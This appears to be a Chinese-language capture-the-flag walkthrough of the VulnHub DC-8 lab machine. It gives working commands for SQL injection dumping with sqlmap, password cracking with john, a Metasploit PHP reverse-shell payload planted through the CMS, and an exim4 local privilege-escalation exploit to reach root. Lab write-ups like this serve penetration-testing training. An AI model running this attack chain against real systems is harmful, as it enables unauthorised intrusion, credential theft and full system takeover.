渗透环境DC-8:https://www.vulnhub.com/entry/dc-8,367/
攻击机:192.168.168.128
靶机:192.168.168.136

信息收集

1
2
nmap -sP 192.168.168.0/24
nmap -sS -p- 192.168.168.136

img

目标开启了80,22端口
访问目标的网页

img

渗透过程

不要对user页面进行爆破,会被ban掉的!!!
逛逛有没有什么注入点啥的,
发现存在sql注入

1
http://192.168.168.136/?nid=3

我们用sqlmap进行一个爆破

1
2
3
4
sqlmap -u http://192.168.168.136/?nid=1 --current-db //当前数据库的名称
sqlmap -u http://192.168.168.136/?nid=1 -tables -D d7db //当前数据库的表名
sqlmap -u http://192.168.168.136/?nid=1 -columns -T users -D d7db //users表下的列名
sqlmap -u http://192.168.168.136/?nid=1 -C "name,pass" -T users -D d7db --dump //users表下的name与pass的内容

这里我们用john进行hash破解

1
john ./hash.txt //hash文件里放我们的hash值

最后发现只有john的密码能出来

img

1
2
账号:john
密码:turtle

登录后台,这个有点向DC-7的方式进行
我们这里选择进行一个监听
这里用的是msf
攻击机

1
2
3
4
5
use exploit/multi/handler
set payload payload/php/meterpreter/reverse_tcp //payload根据实际环境选择
set lhost IP //攻击机ip
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.168.136 LPORT=2222 -f raw > shell.php //生成的php,将代码复制到以下图片中,LHOST为攻击机IP
run

img

选择保存
再攻击机上run
然后在该页面进行请求

img

这是我们的msf就能连接上了

提权

先是一些常规操作

1
2
3
4
5
6
shell
whoami
id
sudo -l
uname -a
find / -perm -u=s -type f 2>/dev/null

最后找到了一个exim4的软件

img

查看对应的版本

1
exim4 --version

img

查是否存在可利用漏洞

1
searchsploit exim 4.8

img

这里我们将第二个脚本上到目标的/tmp目录下

1
2
3
4
5
upload ./46996.sh /tmp //上传
cd /tmp
shell
chmod 4777 ./46996.sh
./46996.sh -m netcat //命令来源,源代码有写的,可以看看

执行完后我们就是root了

img

1
cat /root/flag.txt

img

DC-8 clear